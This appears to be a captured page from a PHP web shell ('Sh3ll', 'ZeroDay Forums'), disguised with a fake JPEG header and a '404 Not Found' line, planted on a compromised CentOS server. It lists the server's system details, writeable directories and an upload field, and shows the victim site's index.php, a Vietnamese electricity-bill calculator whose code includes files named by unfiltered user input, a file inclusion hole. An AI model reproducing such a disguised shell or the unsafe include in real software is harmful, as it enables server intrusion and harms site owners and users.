����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/var/www/html/tien-dien/code/tiendien/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/var/www/html/tien-dien/code/tiendien/index.php
<?php
$CORE->title_page = 'Tiền điện';
$code = isset($CORE->input['code']) ? $CORE->input['code'] : '';
if($code!=''){
    include $code.'.php';
}
include 'layout/'.$INFO['path_skin'].'/header.php';
include 'layout/'.$INFO['path_skin'].'/menu.php';
?>
    <!-- Nội dung HTML và JavaScript cho trang tiền điện -->
    <div class="container mt-4">
        <h2>Nhập số điện (kWh) và tính tiền các phòng</h2>
        <p>Nhập số điện (kWh) sử dụng cho Phòng 1. Nhấn nút "Thêm phòng" để thêm các phòng tiếp theo. Sau đó nhấn "Tính tiền" để xem chi phí.</p>
        <p><small>Lưu ý: Tiền điện mỗi phòng được tính dựa trên tổng số điện tiêu thụ của tất cả các phòng áp dụng theo biểu giá bậc thang, sau đó phân bổ theo tỷ lệ tiêu thụ và cộng thêm 8% VAT.</small></p>
        <form id="soDienForm">
            <div id="inputContainer">
                <div class="form-group mb-3">
                    <label for="so_dien_phong_1" class="form-label">Số điện Phòng 1 (kWh):</label>
                    <input type="number" class="form-control" id="so_dien_phong_1" name="so_dien_phong[]" placeholder="Nhập số kWh" required min="0">
                    <div class="room-cost mt-1 text-muted">
                        <div>Thành tiền (chưa VAT): <span class="cost-value-pre-tax fw-bold">0</span> VNĐ</div>
                        <div>Thành tiền (đã VAT 8%): <span class="cost-value-post-tax fw-bold">0</span> VNĐ</div>

                        <div>Phải đóng: <span class="tien_dong_thuc fw-bold">0</span> VNĐ</div>

                    </div>
                </div>
            </div>
            <div class="mt-3">
                <button type="button" id="addRoomButton" class="btn btn-primary">Thêm phòng</button>
                <button type="button" id="calculateButton" class="btn btn-success ms-2">Tính tiền điện</button>
            </div>
        </form>
    </div>
    <div class="card">
        <div class="card-header text-center">
            Total VAT: <span id="total_cost_vat"></span>
        </div>
        <div class="card-body text-center">
            Tiền đóng: <input type="text" value="" id="tien_dong">
        </div>
    </div>
    <div class="container mt-4 mb-4">
        <h2>Bảng giá bán lẻ điện sinh hoạt</h2>
        <table class="table table-bordered table-striped">
            <thead class="thead-dark">
            <tr>
                <th scope="col">Bậc</th>
                <th scope="col">Mức sử dụng kWh</th>
                <th scope="col">Giá bán (VNĐ/kWh) - Chưa VAT</th>
            </tr>
            </thead>
            <tbody>
            <tr>
                <td>Bậc 1</td>
                <td>Cho kWh từ 0 - 50</td>
                <td>1.984</td>
            </tr>
            <tr>
                <td>Bậc 2</td>
                <td>Cho kWh từ 51 - 100</td>
                <td>2.050</td>
            </tr>
            <tr>
                <td>Bậc 3</td>
                <td>Cho kWh từ 101 - 200</td>
                <td>2.380</td>
            </tr>
            <tr>
                <td>Bậc 4</td>
                <td>Cho kWh từ 201 - 300</td>
                <td>2.998</td>
            </tr>
            <tr>
                <td>Bậc 5</td>
                <td>Cho kWh từ 301 - 400</td>
                <td>3.350</td>
            </tr>
            <tr>
                <td>Bậc 6</td>
                <td>Cho kWh từ 401 trở lên</td>
                <td>3.460</td>
            </tr>
            </tbody>
        </table>
    </div>
    <!-- Kết thúc nội dung HTML và JavaScript -->
<?php
include 'layout/'.$INFO['path_skin'].'/footer.php';
?>

ZeroDay Forums Mini